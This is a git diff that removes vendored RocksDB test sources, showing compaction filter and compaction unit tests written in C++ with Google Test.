-  PutFixed64(&three, 3);
-  PutFixed64(&four, 4);
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  options.num_levels = 3;
-  // Filter out keys with value is 2.
-  options.compaction_filter_factory =
-      std::make_shared<ConditionalFilterFactory>(two);
-  DestroyAndReopen(options);
-
-  // In the same compaction, a value type needs to be deleted based on
-  // compaction filter, and there is a merge type for the key. compaction
-  // filter result is ignored.
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", two));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foo", one));
-  ASSERT_OK(Flush());
-  std::string newvalue = Get("foo");
-  ASSERT_EQ(newvalue, three);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("foo");
-  ASSERT_EQ(newvalue, three);
-
-  // value key can be deleted based on compaction filter, leaving only
-  // merge keys.
-  ASSERT_OK(db_->Put(WriteOptions(), "bar", two));
-  ASSERT_OK(Flush());
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("bar");
-  ASSERT_EQ("NOT_FOUND", newvalue);
-  ASSERT_OK(db_->Merge(WriteOptions(), "bar", two));
-  ASSERT_OK(Flush());
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("bar");
-  ASSERT_EQ(two, two);
-
-  // Compaction filter never applies to merge keys.
-  ASSERT_OK(db_->Put(WriteOptions(), "foobar", one));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foobar", two));
-  ASSERT_OK(Flush());
-  newvalue = Get("foobar");
-  ASSERT_EQ(newvalue, three);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("foobar");
-  ASSERT_EQ(newvalue, three);
-
-  // In the same compaction, both of value type and merge type keys need to be
-  // deleted based on compaction filter, and there is a merge type for the key.
-  // For both keys, compaction filter results are ignored.
-  ASSERT_OK(db_->Put(WriteOptions(), "barfoo", two));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "barfoo", two));
-  ASSERT_OK(Flush());
-  newvalue = Get("barfoo");
-  ASSERT_EQ(newvalue, four);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("barfoo");
-  ASSERT_EQ(newvalue, four);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTestCompactionFilter, CompactionFilterContextManual) {
-  KeepFilterFactory* filter = new KeepFilterFactory(true, true);
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_filter_factory.reset(filter);
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 8;
-  Reopen(options);
-  int num_keys_per_file = 400;
-  for (int j = 0; j < 3; j++) {
-    // Write several keys.
-    const std::string value(10, 'x');
-    for (int i = 0; i < num_keys_per_file; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%08d%02d", i, j);
-      Put(key, value);
-    }
-    dbfull()->TEST_FlushMemTable();
-    // Make sure next file is much smaller so automatic compaction will not
-    // be triggered.
-    num_keys_per_file /= 2;
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // Force a manual compaction
-  cfilter_count = 0;
-  filter->expect_manual_compaction_.store(true);
-  filter->expect_full_compaction_.store(true);
-  filter->expect_cf_id_.store(0);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(cfilter_count, 700);
-  ASSERT_EQ(NumSortedRuns(0), 1);
-  ASSERT_TRUE(filter->compaction_filter_created());
-
-  // Verify total number of keys is correct after manual compaction.
-  {
-    int count = 0;
-    int total = 0;
-    Arena arena;
-    InternalKeyComparator icmp(options.comparator);
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-    ScopedArenaIterator iter(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg));
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      ikey.sequence = -1;
-      ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-      total++;
-      if (ikey.sequence != 0) {
-        count++;
-      }
-      iter->Next();
-    }
-    ASSERT_EQ(total, 700);
-    ASSERT_EQ(count, 1);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTestCompactionFilter, CompactionFilterContextCfId) {
-  KeepFilterFactory* filter = new KeepFilterFactory(false, true);
-  filter->expect_cf_id_.store(1);
-
-  Options options = CurrentOptions();
-  options.compaction_filter_factory.reset(filter);
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 2;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  int num_keys_per_file = 400;
-  for (int j = 0; j < 3; j++) {
-    // Write several keys.
-    const std::string value(10, 'x');
-    for (int i = 0; i < num_keys_per_file; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%08d%02d", i, j);
-      Put(1, key, value);
-    }
-    Flush(1);
-    // Make sure next file is much smaller so automatic compaction will not
-    // be triggered.
-    num_keys_per_file /= 2;
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_TRUE(filter->compaction_filter_created());
-}
-
-#ifndef ROCKSDB_LITE
-// Compaction filters should only be applied to records that are newer than the
-// latest snapshot. This test inserts records and applies a delete filter.
-TEST_F(DBTestCompactionFilter, CompactionFilterSnapshot) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<DeleteFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Put some data.
-  const Snapshot* snapshot = nullptr;
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-
-    if (table == 0) {
-      snapshot = db_->GetSnapshot();
-    }
-  }
-  assert(snapshot != nullptr);
-
-  cfilter_count = 0;
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // The filter should delete 10 records.
-  ASSERT_EQ(30U, cfilter_count);
-
-  // Release the snapshot and compact again -> now all records should be
-  // removed.
-  db_->ReleaseSnapshot(snapshot);
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ(0U, CountLiveFiles());
-}
-
-// Compaction filters should only be applied to records that are newer than the
-// latest snapshot. However, if the compaction filter asks to ignore snapshots
-// records newer than the snapshot will also be processed
-TEST_F(DBTestCompactionFilter, CompactionFilterIgnoreSnapshot) {
-  std::string five = ToString(5);
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<DeleteISFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Put some data.
-  const Snapshot* snapshot = nullptr;
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-
-    if (table == 0) {
-      snapshot = db_->GetSnapshot();
-    }
-  }
-  assert(snapshot != nullptr);
-
-  cfilter_count = 0;
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // The filter should delete 40 records.
-  ASSERT_EQ(40U, cfilter_count);
-
-  {
-    // Scan the entire database as of the snapshot to ensure
-    // that nothing is left
-    ReadOptions read_options;
-    read_options.snapshot = snapshot;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-    iter->SeekToFirst();
-    int count = 0;
-    while (iter->Valid()) {
-      count++;
-      iter->Next();
-    }
-    ASSERT_EQ(count, 6);
-    read_options.snapshot = 0;
-    std::unique_ptr<Iterator> iter1(db_->NewIterator(read_options));
-    iter1->SeekToFirst();
-    count = 0;
-    while (iter1->Valid()) {
-      count++;
-      iter1->Next();
-    }
-    // We have deleted 10 keys from 40 using the compaction filter
-    //  Keys 6-9 before the snapshot and 100-105 after the snapshot
-    ASSERT_EQ(count, 30);
-  }
-
-  // Release the snapshot and compact again -> now all records should be
-  // removed.
-  db_->ReleaseSnapshot(snapshot);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTestCompactionFilter, SkipUntil) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<SkipEvenFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Write 100K keys, these are written to a few files in L0.
-  for (int table = 0; table < 4; ++table) {
-    // Key ranges in tables are [0, 38], [106, 149], [212, 260], [318, 371].
-    for (int i = table * 6; i < 39 + table * 11; ++i) {
-      char key[100];
-      snprintf(key, sizeof(key), "%010d", table * 100 + i);
-      Put(key, std::to_string(table * 1000 + i));
-    }
-    Flush();
-  }
-
-  cfilter_skips = 0;
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // Number of skips in tables: 2, 3, 3, 3.
-  ASSERT_EQ(11, cfilter_skips);
-
-  for (int table = 0; table < 4; ++table) {
-    for (int i = table * 6; i < 39 + table * 11; ++i) {
-      int k = table * 100 + i;
-      char key[100];
-      snprintf(key, sizeof(key), "%010d", table * 100 + i);
-      auto expected = std::to_string(table * 1000 + i);
-      std::string val;
-      Status s = db_->Get(ReadOptions(), key, &val);
-      if (k / 10 % 2 == 0) {
-        ASSERT_TRUE(s.IsNotFound());
-      } else {
-        ASSERT_OK(s);
-        ASSERT_EQ(expected, val);
-      }
-    }
-  }
-}
-
-TEST_F(DBTestCompactionFilter, SkipUntilWithBloomFilter) {
-  BlockBasedTableOptions table_options;
-  table_options.whole_key_filtering = false;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(100, false));
-
-  Options options = CurrentOptions();
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewCappedPrefixTransform(9));
-  options.compaction_filter_factory = std::make_shared<SkipEvenFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  Put("0000000010", "v10");
-  Put("0000000020", "v20"); // skipped
-  Put("0000000050", "v50");
-  Flush();
-
-  cfilter_skips = 0;
-  EXPECT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  EXPECT_EQ(1, cfilter_skips);
-
-  Status s;
-  std::string val;
-
-  s = db_->Get(ReadOptions(), "0000000010", &val);
-  ASSERT_OK(s);
-  EXPECT_EQ("v10", val);
-
-  s = db_->Get(ReadOptions(), "0000000020", &val);
-  EXPECT_TRUE(s.IsNotFound());
-
-  s = db_->Get(ReadOptions(), "0000000050", &val);
-  ASSERT_OK(s);
-  EXPECT_EQ("v50", val);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_compaction_test.cc b/thirdparty/rocksdb/db/db_compaction_test.cc
deleted file mode 100644
index ca77d5b..0000000
--- a/thirdparty/rocksdb/db/db_compaction_test.cc
+++ /dev/null
@@ -1,2835 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "port/port.h"
-#include "rocksdb/experimental.h"
-#include "rocksdb/utilities/convenience.h"
-#include "util/sync_point.h"
-namespace rocksdb {
-
-// SYNC_POINT is not supported in released Windows mode.
-#if !defined(ROCKSDB_LITE)
-
-class DBCompactionTest : public DBTestBase {
- public:
-  DBCompactionTest() : DBTestBase("/db_compaction_test") {}
-};
-
-class DBCompactionTestWithParam
-    : public DBTestBase,
-      public testing::WithParamInterface<std::tuple<uint32_t, bool>> {
- public:
-  DBCompactionTestWithParam() : DBTestBase("/db_compaction_test") {
-    max_subcompactions_ = std::get<0>(GetParam());
-    exclusive_manual_compaction_ = std::get<1>(GetParam());
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  uint32_t max_subcompactions_;
-  bool exclusive_manual_compaction_;
-};
-
-class DBCompactionDirectIOTest : public DBCompactionTest,
-                                 public ::testing::WithParamInterface<bool> {
- public:
-  DBCompactionDirectIOTest() : DBCompactionTest() {}
-};
-
-namespace {
-
-class FlushedFileCollector : public EventListener {
- public:
-  FlushedFileCollector() {}
-  ~FlushedFileCollector() {}
-
-  virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    flushed_files_.push_back(info.file_path);
-  }
-
-  std::vector<std::string> GetFlushedFiles() {
-    std::lock_guard<std::mutex> lock(mutex_);
-    std::vector<std::string> result;
-    for (auto fname : flushed_files_) {
-      result.push_back(fname);
-    }
-    return result;
-  }
-
-  void ClearFlushedFiles() { flushed_files_.clear(); }
-
- private:
-  std::vector<std::string> flushed_files_;
-  std::mutex mutex_;
-};
-
-static const int kCDTValueSize = 1000;
-static const int kCDTKeysPerBuffer = 4;
-static const int kCDTNumLevels = 8;
-Options DeletionTriggerOptions(Options options) {
-  options.compression = kNoCompression;
-  options.write_buffer_size = kCDTKeysPerBuffer * (kCDTValueSize + 24);
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 0;
-  options.num_levels = kCDTNumLevels;
-  options.level0_file_num_compaction_trigger = 1;
-  options.target_file_size_base = options.write_buffer_size * 2;
-  options.target_file_size_multiplier = 2;
-  options.max_bytes_for_level_base =
-      options.target_file_size_base * options.target_file_size_multiplier;
-  options.max_bytes_for_level_multiplier = 2;
-  options.disable_auto_compactions = false;
-  return options;
-}
-
-bool HaveOverlappingKeyRanges(
-    const Comparator* c,
-    const SstFileMetaData& a, const SstFileMetaData& b) {
-  if (c->Compare(a.smallestkey, b.smallestkey) >= 0) {
-    if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-      // b.smallestkey <= a.smallestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-    // a.smallestkey < b.smallestkey <= a.largestkey
-    return true;
-  }
-  if (c->Compare(a.largestkey, b.largestkey) <= 0) {
-    if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-      // b.smallestkey <= a.largestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-    // a.smallestkey <= b.largestkey < a.largestkey
-    return true;
-  }
-  return false;
-}
-
-// Identifies all files between level "min_level" and "max_level"
-// which has overlapping key range with "input_file_meta".
-void GetOverlappingFileNumbersForLevelCompaction(
-    const ColumnFamilyMetaData& cf_meta,
-    const Comparator* comparator,
-    int min_level, int max_level,
-    const SstFileMetaData* input_file_meta,
-    std::set<std::string>* overlapping_file_names) {
-  std::set<const SstFileMetaData*> overlapping_files;
-  overlapping_files.insert(input_file_meta);
-  for (int m = min_level; m <= max_level; ++m) {
-    for (auto& file : cf_meta.levels[m].files) {
-      for (auto* included_file : overlapping_files) {
-        if (HaveOverlappingKeyRanges(
-                comparator, *included_file, file)) {
-          overlapping_files.insert(&file);
-          overlapping_file_names->insert(file.name);
-          break;
-        }
-      }
-    }
-  }
-}
-
-void VerifyCompactionResult(
-    const ColumnFamilyMetaData& cf_meta,
-    const std::set<std::string>& overlapping_file_numbers) {
-#ifndef NDEBUG
-  for (auto& level : cf_meta.levels) {
-    for (auto& file : level.files) {
-      assert(overlapping_file_numbers.find(file.name) ==
-             overlapping_file_numbers.end());
-    }
-  }
-#endif
-}
-
-const SstFileMetaData* PickFileRandomly(
-    const ColumnFamilyMetaData& cf_meta,
-    Random* rand,
-    int* level = nullptr) {
-  auto file_id = rand->Uniform(static_cast<int>(
-      cf_meta.file_count)) + 1;
-  for (auto& level_meta : cf_meta.levels) {
-    if (file_id <= level_meta.files.size()) {
-      if (level != nullptr) {
-        *level = level_meta.level;
-      }
-      auto result = rand->Uniform(file_id);
-      return &(level_meta.files[result]);
-    }
-    file_id -= static_cast<uint32_t>(level_meta.files.size());
-  }
-  assert(false);
-  return nullptr;
-}
-}  // anonymous namespace
-
-// All the TEST_P tests run once with sub_compactions disabled (i.e.
-// options.max_subcompactions = 1) and once with it enabled
-TEST_P(DBCompactionTestWithParam, CompactionDeletionTrigger) {
-  for (int tid = 0; tid < 3; ++tid) {
-    uint64_t db_size[2];
-    Options options = DeletionTriggerOptions(CurrentOptions());
-    options.max_subcompactions = max_subcompactions_;
-
-    if (tid == 1) {
-      // the following only disable stats update in DB::Open()
-      // and should not affect the result of this test.
-      options.skip_stats_update_on_db_open = true;
-    } else if (tid == 2) {
-      // third pass with universal compaction
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 1;
-    }
-
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    const int kTestSize = kCDTKeysPerBuffer * 1024;
-    std::vector<std::string> values;
-    for (int k = 0; k < kTestSize; ++k) {
-      values.push_back(RandomString(&rnd, kCDTValueSize));
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[0] = Size(Key(0), Key(kTestSize - 1));
-
-    for (int k = 0; k < kTestSize; ++k) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[1] = Size(Key(0), Key(kTestSize - 1));
-
-    // must have much smaller db size.
-    ASSERT_GT(db_size[0] / 3, db_size[1]);
-  }
-}
-
-TEST_F(DBCompactionTest, SkipStatsUpdateTest) {
-  // This test verify UpdateAccumulatedStats is not on
-  // if options.skip_stats_update_on_db_open = true
-  // The test will need to be updated if the internal behavior changes.
-
-  Options options = DeletionTriggerOptions(CurrentOptions());
-  options.env = env_;
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  const int kTestSize = kCDTKeysPerBuffer * 512;
-  std::vector<std::string> values;
-  for (int k = 0; k < kTestSize; ++k) {
-    values.push_back(RandomString(&rnd, kCDTValueSize));
-    ASSERT_OK(Put(Key(k), values[k]));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Reopen the DB with stats-update disabled
-  options.skip_stats_update_on_db_open = true;
-  env_->random_file_open_counter_.store(0);
-  Reopen(options);
-
-  // As stats-update is disabled, we expect a very low number of
-  // random file open.
-  // Note that this number must be changed accordingly if we change
-  // the number of files needed to be opened in the DB::Open process.
-  const int kMaxFileOpenCount = 10;
-  ASSERT_LT(env_->random_file_open_counter_.load(), kMaxFileOpenCount);
-
-  // Repeat the reopen process, but this time we enable
-  // stats-update.
-  options.skip_stats_update_on_db_open = false;
-  env_->random_file_open_counter_.store(0);
-  Reopen(options);
-
-  // Since we do a normal stats update on db-open, there
-  // will be more random open files.
-  ASSERT_GT(env_->random_file_open_counter_.load(), kMaxFileOpenCount);
-}
-
-TEST_F(DBCompactionTest, TestTableReaderForCompaction) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.new_table_reader_for_compaction_inputs = true;
-  options.max_open_files = 100;
-  options.level0_file_num_compaction_trigger = 3;
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  int num_table_cache_lookup = 0;
-  int num_new_table_reader = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TableCache::FindTable:0", [&](void* arg) {
-        assert(arg != nullptr);
-        bool no_io = *(reinterpret_cast<bool*>(arg));
-        if (!no_io) {
-          // filter out cases for table properties queries.
-          num_table_cache_lookup++;
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TableCache::GetTableReader:0",
-      [&](void* arg) { num_new_table_reader++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  for (int k = 0; k < options.level0_file_num_compaction_trigger; ++k) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-    ASSERT_OK(Put(Key(10 - k), "bar"));
-    if (k < options.level0_file_num_compaction_trigger - 1) {
-      num_table_cache_lookup = 0;
-      Flush();
-      dbfull()->TEST_WaitForCompact();
-      // preloading iterator issues one table cache lookup and create
-      // a new table reader.
-      ASSERT_EQ(num_table_cache_lookup, 1);
-      ASSERT_EQ(num_new_table_reader, 1);
-
-      num_table_cache_lookup = 0;
-      num_new_table_reader = 0;
-      ASSERT_EQ(Key(k), Get(Key(k)));
-      // lookup iterator from table cache and no need to create a new one.
-      ASSERT_EQ(num_table_cache_lookup, 1);
-      ASSERT_EQ(num_new_table_reader, 0);
-    }
-  }
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  // Preloading iterator issues one table cache lookup and creates
-  // a new table reader. One file is created for flush and one for compaction.
-  // Compaction inputs make no table cache look-up for data/range deletion
-  // iterators
-  ASSERT_EQ(num_table_cache_lookup, 2);
-  // Create new iterator for:
-  // (1) 1 for verifying flush results
-  // (2) 3 for compaction input files
-  // (3) 1 for verifying compaction results.
-  ASSERT_EQ(num_new_table_reader, 5);
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  ASSERT_EQ(Key(1), Get(Key(1)));
-  ASSERT_EQ(num_table_cache_lookup, 1);
-  ASSERT_EQ(num_new_table_reader, 0);
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  CompactRangeOptions cro;
-  cro.change_level = true;
-  cro.target_level = 2;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  db_->CompactRange(cro, nullptr, nullptr);
-  // Only verifying compaction outputs issues one table cache lookup
-  // for both data block and range deletion block).
-  ASSERT_EQ(num_table_cache_lookup, 1);
-  // One for compaction input, one for verifying compaction results.
-  ASSERT_EQ(num_new_table_reader, 2);
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  ASSERT_EQ(Key(1), Get(Key(1)));
-  ASSERT_EQ(num_table_cache_lookup, 1);
-  ASSERT_EQ(num_new_table_reader, 0);
-
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-TEST_P(DBCompactionTestWithParam, CompactionDeletionTriggerReopen) {
-  for (int tid = 0; tid < 2; ++tid) {
-    uint64_t db_size[3];
-    Options options = DeletionTriggerOptions(CurrentOptions());
-    options.max_subcompactions = max_subcompactions_;
-
-    if (tid == 1) {
-      // second pass with universal compaction
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 1;
-    }
-
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    // round 1 --- insert key/value pairs.
-    const int kTestSize = kCDTKeysPerBuffer * 512;
-    std::vector<std::string> values;
-    for (int k = 0; k < kTestSize; ++k) {
-      values.push_back(RandomString(&rnd, kCDTValueSize));
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[0] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-
-    // round 2 --- disable auto-compactions and issue deletions.
-    options.create_if_missing = false;
-    options.disable_auto_compactions = true;
-    Reopen(options);
-
-    for (int k = 0; k < kTestSize; ++k) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    db_size[1] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-    // as auto_compaction is off, we shouldn't see too much reduce
-    // in db size.
-    ASSERT_LT(db_size[0] / 3, db_size[1]);
-
-    // round 3 --- reopen db with auto_compaction on and see if
-    // deletion compensation still work.
-    options.disable_auto_compactions = false;
-    Reopen(options);
-    // insert relatively small amount of data to trigger auto compaction.
-    for (int k = 0; k < kTestSize / 10; ++k) {
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[2] = Size(Key(0), Key(kTestSize - 1));
-    // this time we're expecting significant drop in size.
-    ASSERT_GT(db_size[0] / 3, db_size[2]);
-  }
-}
-
-TEST_F(DBCompactionTest, DisableStatsUpdateReopen) {
-  uint64_t db_size[3];
-  for (int test = 0; test < 2; ++test) {
-    Options options = DeletionTriggerOptions(CurrentOptions());
-    options.skip_stats_update_on_db_open = (test == 0);
-
-    env_->random_read_counter_.Reset();
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    // round 1 --- insert key/value pairs.
-    const int kTestSize = kCDTKeysPerBuffer * 512;
-    std::vector<std::string> values;
-    for (int k = 0; k < kTestSize; ++k) {
-      values.push_back(RandomString(&rnd, kCDTValueSize));
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[0] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-
-    // round 2 --- disable auto-compactions and issue deletions.
-    options.create_if_missing = false;
-    options.disable_auto_compactions = true;
-
-    env_->random_read_counter_.Reset();
-    Reopen(options);
-
-    for (int k = 0; k < kTestSize; ++k) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    db_size[1] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-    // as auto_compaction is off, we shouldn't see too much reduce
-    // in db size.
-    ASSERT_LT(db_size[0] / 3, db_size[1]);
-
-    // round 3 --- reopen db with auto_compaction on and see if
-    // deletion compensation still work.
-    options.disable_auto_compactions = false;
-    Reopen(options);
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[2] = Size(Key(0), Key(kTestSize - 1));
-
-    if (options.skip_stats_update_on_db_open) {
-      // If update stats on DB::Open is disable, we don't expect
-      // deletion entries taking effect.
-      ASSERT_LT(db_size[0] / 3, db_size[2]);
-    } else {
-      // Otherwise, we should see a significant drop in db size.
-      ASSERT_GT(db_size[0] / 3, db_size[2]);
-    }
-  }
-}
-
-
-TEST_P(DBCompactionTestWithParam, CompactionTrigger) {
-  const int kNumKeysPerFile = 100;
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.num_levels = 3;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_subcompactions = max_subcompactions_;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumKeysPerFile));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    std::vector<std::string> values;
-    // Write 100KB (100 values, each 1K)
-    for (int i = 0; i < kNumKeysPerFile; i++) {
-      values.push_back(RandomString(&rnd, 990));
-      ASSERT_OK(Put(1, Key(i), values[i]));
-    }
-    // put extra key to trigger flush
-    ASSERT_OK(Put(1, "", ""));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), num + 1);
-  }
-
-  // generate one more file in level-0, and should trigger level-0 compaction
-  std::vector<std::string> values;
-  for (int i = 0; i < kNumKeysPerFile; i++) {
-    values.push_back(RandomString(&rnd, 990));
-    ASSERT_OK(Put(1, Key(i), values[i]));
-  }
-  // put extra key to trigger flush
-  ASSERT_OK(Put(1, "", ""));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 1);
-}
-
-TEST_F(DBCompactionTest, BGCompactionsAllowed) {
-  // Create several column families. Make compaction triggers in all of them
-  // and see number of compactions scheduled to be less than allowed.
-  const int kNumKeysPerFile = 100;
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.num_levels = 3;
-  // Should speed up compaction when there are 4 files.
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 20;
-  options.soft_pending_compaction_bytes_limit = 1 << 30;  // Infinitely large
-  options.max_background_compactions = 3;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumKeysPerFile));
-
-  // Block all threads in thread pool.
-  const size_t kTotalTasks = 4;
-  env_->SetBackgroundThreads(4, Env::LOW);
-  test::SleepingBackgroundTask sleeping_tasks[kTotalTasks];
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                   &sleeping_tasks[i], Env::Priority::LOW);
-    sleeping_tasks[i].WaitUntilSleeping();
-  }
-
-  CreateAndReopenWithCF({"one", "two", "three"}, options);
-
-  Random rnd(301);
-  for (int cf = 0; cf < 4; cf++) {
-    for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-      for (int i = 0; i < kNumKeysPerFile; i++) {
-        ASSERT_OK(Put(cf, Key(i), ""));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put(cf, "", ""));
-      dbfull()->TEST_WaitForFlushMemTable(handles_[cf]);
-      ASSERT_EQ(NumTableFilesAtLevel(0, cf), num + 1);
-    }
-  }
-
-  // Now all column families qualify compaction but only one should be
-  // scheduled, because no column family hits speed up condition.
-  ASSERT_EQ(1, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-
-  // Create two more files for one column family, which triggers speed up
-  // condition, three compactions will be scheduled.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
